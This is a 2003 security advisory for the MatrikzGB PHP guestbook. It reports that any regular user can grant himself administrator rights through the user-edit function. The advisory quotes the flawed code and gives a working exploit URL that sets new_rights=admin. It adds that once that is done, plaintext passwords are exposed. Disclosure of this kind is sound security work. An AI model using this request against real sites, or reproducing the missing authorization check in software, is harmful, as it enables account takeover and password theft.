Security hole in MatrikzGB Guestbook                                                                                   

15/8/2003 

 

Vulnerable Versions: 

Version 2.0 and prior 

Version 3   (not tested) 

 

Summary: 

MatrikzGB was written by Thomas Hempel for 

www.onsite.org. 

A bug in index.php allows a user with a regular user 

account to give administrator rights to himself. 

 

Details: 

The bug is in the user edit function: 

Every regular user is allowed to chanche rights or do any 

modifications on existing users. 

 if ($new_username != "" && $new_password != "") { 

create_user($new_username,$new_password,$new_rights,$entry_index); 

echo "<tr><th class=\"ok\">Der Benutzer wurde angelegt!"; 

 

Example: 

This is a example how to give administrator rights to 

yourself.    

http://www.target.com/php/gaestebuch/admin/index.php?do=options&action=optionsok&new_username=regularuser&new_password=regularpass&new_rights=admin&user=regularuser&pass=regularpass 

 

Comment: 

When you got administrator rights,you can look up the 

passwords of all other users,they are in plaintext. 

 

Vendor status: 

Vendor has been contacted. 

 

by Stephan "mastamorphixx" S. ,member of 

www.lostkey.org                                                                                   

contact:mastamorphixx@web.de 

irc.euirc.de #lostkey